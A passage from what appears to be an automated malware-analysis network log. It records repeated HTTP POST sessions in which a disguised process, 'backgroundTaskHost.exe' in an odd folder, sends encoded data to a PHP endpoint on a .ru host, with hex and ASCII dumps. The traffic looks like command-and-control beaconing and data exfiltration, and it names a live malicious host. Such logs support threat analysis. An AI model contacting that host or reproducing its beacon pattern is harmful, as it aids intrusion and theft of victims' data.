                                                                                          Jan 4, 2025 11:08:33.248550892 CET2516OUTData Raw: 51 5e 5e 5f 55 5e 5a 52 5c 5b 52 58 57 5a 58 5f 58 51 5a 59 52 54 51 5d 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q^^_U^ZR\[RXWZX_XQZYRTQ]^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-=)/A4^6% <=?6"%Z0<4>+/<+;_ -*_*+!Y#!Y,2
                                                                                          Jan 4, 2025 11:08:33.337733984 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:33.508618116 CET803INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:33 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jaxgVRiv0fYGvdIOQPfs0qDBYpHPpnYdl20hmptcHdXfQF5GeH3HjXJwbRU8yxZscNPeSubVUlq8u5jct784ShJA%2F9nzPNFn7Tx9tzDPcX06hkevyLX%2BXY2Uk7sswuM3Pf3CL5i6"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d901e43433d-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2053&min_rtt=1723&rtt_var=1307&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2833&delivery_rate=334172&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          63192.168.2.450007104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:33.646380901 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:33.998532057 CET2520OUTData Raw: 54 58 5b 54 55 58 5f 56 5c 5b 52 58 57 52 58 5c 58 57 5a 5d 52 50 51 56 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TX[TUX_V\[RXWRX\XWZ]RPQV^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.@=(7*%#(,5Y#.&'8#9),]+&#-9=!Y#!Y,
                                                                                          Jan 4, 2025 11:08:34.117625952 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:34.293034077 CET811INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:34 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XEug750A%2B55SBNJvUGYFj59eYxwdTA3G%2FigVCDVjaJgiZfIG%2BIyNbd%2Bpr%2Bp12w5KFycbasd8p0Y3TwVvxp6rUcL9EtlZSJUPtlY6KP3DOmezVv18LV%2F0uybAnzpApf0kCUcXTqbL"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d94eaea0f68-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=7411&min_rtt=1478&rtt_var=12422&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=29826&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          64192.168.2.450013104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:34.427416086 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:34.779824972 CET2520OUTData Raw: 54 58 5e 5e 55 5a 5a 5c 5c 5b 52 58 57 52 58 5b 58 56 5a 59 52 52 51 5a 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TX^^UZZ\\[RXWRX[XVZYRRQZ^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-*97 ;*% #\>Z-!!0>V#>-(<+Y(634>._=!Y#!Y,
                                                                                          Jan 4, 2025 11:08:34.871939898 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:35.144752979 CET813INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:35 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r9p9g1759Cs1Spl1%2BrF7FHtAHlVCpqaFGLUiXF9NhMe9rtF0P%2Ba8mBGest%2B3zl7ttOY7k7LgRSh1BJEy8Nh8ml11%2FnLLH3xv2XFgT5Y0EBnO5oZV9dba0QhLoRSj0yZ%2F4MC%2B%2FofE"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d99ac914241-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=8520&min_rtt=1902&rtt_var=13950&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=26618&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          65192.168.2.450019104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:35.268477917 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2516
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          66192.168.2.450025104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:35.476320982 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 1844
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:35.826721907 CET1844OUTData Raw: 54 5b 5e 54 55 52 5a 55 5c 5b 52 58 57 58 58 5d 58 54 5a 52 52 50 51 5a 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T[^TURZU\[RXWXX]XTZRRPQZ^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.C)93B#^%P%+Y(<56$=$#-:(]?%47==!Y#!Y,.
                                                                                          Jan 4, 2025 11:08:35.927033901 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:36.215492010 CET953INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:36 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dGuIvtT1g0oGyDLiuLvyqlaNBR3L1MkUuMTClxya1rJr6RkAjemb4QZ%2BovOygX0cNRm8JM%2BXQ9XlOkX5szBmTOF5wXA7bdZiFNMSUaGWukst23jm8NAS6lzbx%2B9ANPTS3ut0zNjn"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6da04fcb4291-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3420&min_rtt=1731&rtt_var=4029&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2161&delivery_rate=95737&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 39 38 0d 0a 02 11 27 0f 3f 10 20 51 22 59 28 5c 2a 10 39 00 25 33 27 02 2f 0f 3b 16 37 3c 27 5a 38 32 39 58 26 33 01 04 3d 59 2f 0e 34 09 2f 57 30 20 2a 5d 06 12 3b 02 3f 2c 0c 10 25 05 3d 0f 2a 31 3d 1a 24 0f 22 58 24 13 3f 5b 3f 3c 21 16 25 12 18 0f 2b 3c 36 12 3a 03 3c 0a 2c 3f 30 56 21 13 21 53 08 13 20 57 31 08 27 1e 2a 09 39 10 31 33 25 5a 24 04 0a 0f 3d 2b 23 0b 33 07 3e 17 3a 31 2f 13 28 33 34 58 3a 58 38 5a 3c 3e 2b 1d 33 06 22 5c 20 01 23 56 05 3d 57 4c 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98'? Q"Y(\*9%3'/;7<'Z829X&3=Y/4/W0 *];?,%=*1=$"X$?[?<!%+<6:<,?0V!!S W1'*913%Z$=+#3>:1/(34X:X8Z<>+3"\ #V=WL0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          67192.168.2.450026104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:35.595911980 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:35.951653004 CET2520OUTData Raw: 54 5a 5e 56 55 5c 5a 5c 5c 5b 52 58 57 58 58 5a 58 53 5a 5f 52 56 51 58 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TZ^VU\Z\\[RXWXXZXSZ_RVQX^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.D*+4%V&U+\=/-!%0X?V >6??;^(%(4>.>+!Y#!Y,.
                                                                                          Jan 4, 2025 11:08:36.068551064 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:36.328774929 CET813INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:36 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nsFeRH91kW%2BDnFCS%2B8YOo18DlimkNAwg6imIP%2FVX4FvS67x6ttXpcqCy1DFh6c1%2Bl4TUuFDJtdQq61KxEwCn1%2BYugmmQI%2Bt6UeB5i2W11VvLrmi0SB52e%2BTwhVv1CNkmCK6f1biT"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6da11a848ca1-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=8191&min_rtt=1999&rtt_var=13135&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=28326&cwnd=167&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          68192.168.2.450032104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:36.938174963 CET293OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:08:37.295428038 CET2520OUTData Raw: 54 59 5e 56 55 5b 5a 5c 5c 5b 52 58 57 5d 58 5b 58 54 5a 5e 52 5d 51 56 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TY^VU[Z\\[RXW]X[XTZ^R]QV^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.(:?@ 8)%#?])/16-Z$=;W =:+$?6<#=Y)!Y#!Y,
                                                                                          Jan 4, 2025 11:08:37.374682903 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:37.650885105 CET805INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:37 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yWLaMwmNzgf0PrbfDM0UvwUq41ervHPun5oemAuxAmTsAc8e6tPGnqpL6RktOjDG5psW%2BS28JBsjRixNI6aOjeVpXRvf7BMgaLoD79cAe9klvhfXsy0n%2Fs1rOI2uNHb%2BZ0dV3xmO"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6da95b4c4326-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3332&min_rtt=1724&rtt_var=3863&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=100047&cwnd=177&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          69192.168.2.450038104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:37.814647913 CET293OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:08:38.170429945 CET2520OUTData Raw: 54 59 5e 57 55 5b 5f 50 5c 5b 52 58 57 5d 58 59 58 5d 5a 5b 52 57 51 5e 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TY^WU[_P\[RXW]XYX]Z[RWQ^^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-=?B49T&^)<)#>&$X#Q 9+Z$<%8"=!);!Y#!Y,
                                                                                          Jan 4, 2025 11:08:38.267369986 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:38.523518085 CET809INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:38 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BaQmQZzmeb91yNln4QuTFWE4K7kZK5aveMrNTxhAscFUGPomWhNvLv2LneV2UBzdb1i%2FoaCk%2BDxIV%2BFnTNs4rSAHOcpGb%2Fay1DhQfLbH6idNbe2n1j7JTRP3lFeIfml3IR7xRjPy"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6daeef5c4321-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=8013&min_rtt=1743&rtt_var=13194&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=28127&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          70192.168.2.450044104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:38.661503077 CET293OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2516
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:08:39.014211893 CET2516OUTData Raw: 51 5e 5b 50 55 58 5f 53 5c 5b 52 58 57 5a 58 5d 58 56 5a 5b 52 51 51 5f 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q^[PUX_S\[RXWZX]XVZ[RQQ_^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.A*?#81P&U'_))5=)$3 .*P+Z8(%$ :^++!Y#!Y,
                                                                                          Jan 4, 2025 11:08:39.114573956 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:39.379309893 CET806INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:39 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y5QgwX9MDJHMVeMnGQ%2BXqk4q0NBPh2zYusLflYwLDQz3AaoPG%2Bdlq87taz7Kp2P6RMjGhuEDeDu0otLgfWE9BIP0pGr2bpja2v3IIYIdIHfsh2ppxhooY1f%2B6jsqcl%2FT0NoiUPdm"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6db42e5e7289-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3817&min_rtt=1889&rtt_var=4565&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2809&delivery_rate=84305&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          71192.168.2.450050104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:39.547775984 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:39.939918995 CET2520OUTData Raw: 54 5a 5b 55 50 5f 5f 53 5c 5b 52 58 57 58 58 5d 58 51 5a 5e 52 53 51 5b 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TZ[UP__S\[RXWXX]XQZ^RSQ[^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.A=)#7+%1_*/1!>9[$74==(,+Y(6;[7-"Z=!Y#!Y,.
                                                                                          Jan 4, 2025 11:08:40.010370970 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:40.294585943 CET808INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:40 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PDLTfDar1Ug20DfQFHC8GxlTL8CVZvdb9VkWZC%2FxP%2BdU0dQ%2B9S5WbPXHipiKgQ0Oy4%2Fca8YCtwBSpzB4fOIXxnyoOicURDdnQqWVG7kWgtGE1GCFPOI8mW%2BbS6JvUd8xRTTNKIvF"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6db9ca694339-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3960&min_rtt=2366&rtt_var=4075&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=96567&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          72192.168.2.450056104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:40.428394079 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
